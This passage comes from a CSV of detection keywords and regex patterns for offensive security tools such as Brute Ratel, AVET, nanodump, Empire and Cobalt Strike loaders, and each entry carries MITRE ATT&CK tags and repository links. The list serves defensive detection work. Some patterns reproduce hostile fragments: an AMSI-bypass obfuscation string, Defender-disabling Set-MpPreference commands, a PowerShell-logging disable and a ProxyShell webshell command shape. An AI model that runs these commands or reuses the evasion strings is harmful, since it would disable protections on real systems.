with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set_child werfault.exe*",".{0,1000}set_child\swerfault\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set_command_exec exec_via_cmd*",".{0,1000}set_command_exec\sexec_via_cmd.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_command_exec exec_via_powershell*",".{0,1000}set_command_exec\sexec_via_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. 
as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_command_exec no_command*",".{0,1000}set_command_exec\sno_command.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_command_source download_bitsadmin*",".{0,1000}set_command_source\sdownload_bitsadmin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_decoder xor*",".{0,1000}set_decoder\sxor.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. 
as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_empty_pw.py*",".{0,1000}set_empty_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","7","600","145","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*set_injection_technique*",".{0,1000}set_injection_technique.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*set_logon_script.py*",".{0,1000}set_logon_script\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*set_objectpipe \\*",".{0,1000}set_objectpipe\s\\\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set_payload_execution_method exec_shellcode64*",".{0,1000}set_payload_execution_method\sexec_shellcode64.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_payload_execution_method inject_dll*",".{0,1000}set_payload_execution_method\sinject_dll.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_payload_info_source from_command_line_raw*",".{0,1000}set_payload_info_source\sfrom_command_line_raw.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_payload_source download_powershell*",".{0,1000}set_payload_source\sdownload_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*set_rpc_callstack*",".{0,1000}set_rpc_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*set_shellcode",".{0,1000}set_shellcode","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*set_svchost_callstack*",".{0,1000}set_svchost_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*set_wmi_callstack*",".{0,1000}set_wmi_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*set_wmiconfig \*",".{0,1000}set_wmiconfig\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*setc_webshell*",".{0,1000}setc_webshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. 
If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*setdes linux x64 blahblahblah*",".{0,1000}setdes\slinux\sx64\sblahblahblah.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Set-DesktopACLToAllow*",".{0,1000}Set\-DesktopACLToAllow.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-DomainObject*",".{0,1000}Set\-DomainObject.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 
0x11*",".{0,1000}Set\-EtwTraceProvider\s\-Guid\s\'\{A0C1853B\-5C40\-4B15\-8766\-3CF1C58F985A\}\'\s\-AutologgerName\s\'EventLog\-Application\'\s\-Property\s0x11.{0,1000}","offensive_tool_keyword","Set-EtwTraceProvider","disables Microsoft-Windows-PowerShell event logging","T1070.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Seth by SySS GmbH*",".{0,1000}Seth\sby\sSySS\sGmbH.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*seth.py * -j INJECT*",".{0,1000}seth\.py\s.{0,1000}\s\-j\sINJECT.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*Seth-master.zip*",".{0,1000}Seth\-master\.zip.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*SetInitialCheckIn updates the time stamp that the Agent first successfully connected to the Merlin server*",".{0,1000}SetInitialCheckIn\supdates\sthe\stime\sstamp\sthat\sthe\sAgent\sfirst\ssuccessfully\sconnected\sto\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - 
T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*",".{0,1000}sET\-ItEM\s\(\s\'V\'\+\'aR\'\s\+\s\s\'IA\'\s\+\s\'blE\:1q2\'\s\s\+\s\'uZx\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*set-killdate *",".{0,1000}set\-killdate\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Set-Killdate*",".{0,1000}Set\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*setLoaderFlagZero*",".{0,1000}setLoaderFlagZero.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*Set-MacAttribute.ps1*",".{0,1000}Set\-MacAttribute\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-MacroSecurityOff *",".{0,1000}Set\-MacroSecurityOff\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Set-MacroSecurityOff.ps1*",".{0,1000}Set\-MacroSecurityOff\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 
- TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Set-MpPreference -DisableRealtimeMonitoring *true*",".{0,1000}Set\-MpPreference\s\-DisableRealtimeMonitoring\s.{0,1000}true.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-MpPreference -PUAProtection disable*",".{0,1000}Set\-MpPreference\s\-PUAProtection\sdisable.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*",".{0,1000}Set\-OabVirtualDirectory\s\-ExternalUrl\s\'http.{0,1000}\:\/\/.{0,1000}function\sPage_Load\(\)\{.{0,1000}\}\<\/script\>.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - 
T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*setoolkit *",".{0,1000}setoolkit\s.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*SetProcessInjection*encryptor.py*",".{0,1000}SetProcessInjection.{0,1000}encryptor\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*SetProcessInjection-main*",".{0,1000}SetProcessInjection\-main.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" 
"*set-pushover-applicationtoken*",".{0,1000}set\-pushover\-applicationtoken.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*set-pushover-userkeys*",".{0,1000}set\-pushover\-userkeys.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - 